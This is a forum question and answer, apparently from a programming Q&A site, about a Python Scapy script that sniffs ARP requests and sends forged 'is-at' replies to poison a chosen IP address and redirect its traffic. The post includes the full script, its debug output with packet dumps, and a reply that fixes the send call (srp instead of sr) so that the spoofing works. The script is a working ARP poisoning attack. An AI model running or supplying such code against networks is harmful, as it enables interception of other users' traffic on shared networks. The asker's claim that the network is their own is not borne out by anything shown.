I'm trying to use scapy to send a forged arp is-at to direct traffic to my computer (legally of course, this is my network), however scapy prints a warning saying that the mac address isn't found, so it defaults to broadcast.
Also as a side note is there any way to autodetect the mac address of the machine you run this program from?
from scapy.all import *
"""The general ideas of this script is to recieve an arp packet, send back a forged one, claiming to be the ip address we are poisoning but with a different mac
however im no networking genius nor a legitiment hacker"""
arpkt = Ether()/ARP()
#UI
dst = input("Select ip address to poison: ")
#Ethernet settings
arpkt[Ether].src = "" #you would enter your mac here
arpkt[Ether].type = 2054
#ARP settings
arpkt[ARP].hwtype = 1
arpkt[ARP].ptype = 2048
arpkt[ARP].hwlen = 6
arpkt[ARP].plen = 4
arpkt[ARP].op = 2
arpkt[ARP].hwsrc = "" #you would enter your mac here
arpkt[ARP].psrc = dst
#starting sniff
pkts = sniff(count=1, filter="arp")
#sniff loop
while pkts[0].pdst != dst and pkts[0].op == 1:
pkts = sniff(count=1, filter="arp")
print("arp from " + pkts[0].psrc)
#send/recieve packets
if pkts[0].pdst == dst:
arpkt[Ether].dst = pkts[0].src
arpkt[ARP].pdst = pkts[0].psrc
arpkt[ARP].hwdst = pkts[0].hwsrc
#for debugging
pkts[0].show()
arpkt.show()
#send and recieve packets
rpkt = sr(arpkt)
#more debug
arpkt.show()
for x in rpkt:
x.show()
input("Press enter to continue...")
thank you.
Also, here is the output,
Select ip address to poison: 10.0.4.1
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.63
arp from 10.0.4.43
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.63
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.11
arp from 10.0.4.43
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.36
###[ Ethernet ]###
dst = ff:ff:ff:ff:ff:ff
src = 74:ab:93:00:1d:10
type = ARP
###[ ARP ]###
hwtype = Ethernet (10Mb)
ptype = IPv4
hwlen = 6
plen = 4
op = who-has
hwsrc = 74:ab:93:00:1d:10
psrc = 10.0.4.36
hwdst = 00:00:00:00:00:00
pdst = 10.0.4.1
###[ Padding ]###
load = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
###[ Ethernet ]###
dst = 74:ab:93:00:1d:10
src = 50:EB:F6:7E:FF:55
type = ARP
###[ ARP ]###
hwtype = Ethernet (10Mb)
ptype = IPv4
hwlen = 6
plen = 4
op = is-at
hwsrc = 50:EB:F6:7E:FF:55
psrc = 10.0.4.1
hwdst = 74:ab:93:00:1d:10
pdst = 10.0.4.36
Begin emission:
WARNING: Mac address to reach destination not found. Using broadcast.
Finished sending 1 packets.
...........................................................................................................................
Received 123 packets, got 0 answers, remaining 1 packets
###[ Ethernet ]###
dst = 74:ab:93:00:1d:10
src = 50:EB:F6:7E:FF:55
type = ARP
###[ ARP ]###
hwtype = Ethernet (10Mb)
ptype = IPv4
hwlen = 6
plen = 4
op = is-at
hwsrc = 50:EB:F6:7E:FF:55
psrc = 10.0.4.1
hwdst = 74:ab:93:00:1d:10
pdst = 10.0.4.36
Press enter to continue...
0000 Ether / ARP is at 50:EB:F6:7E:FF:55 says 10.0.4.1
Press enter to continue...
it displays, all of the ips that send an arp, and also displays the captured packet and sent packet (for debuging).
As you can see, it also displays WARNING: Mac address to reach destination not found. Using broadcast.
sr is for L3 packets (IP+).
You are sending a L2 packet (Ethernet), so you need to use srp(arpkt) instead of sr(arpkt).
On layer 2, remember that you might need to specify the interface using iface= in srp.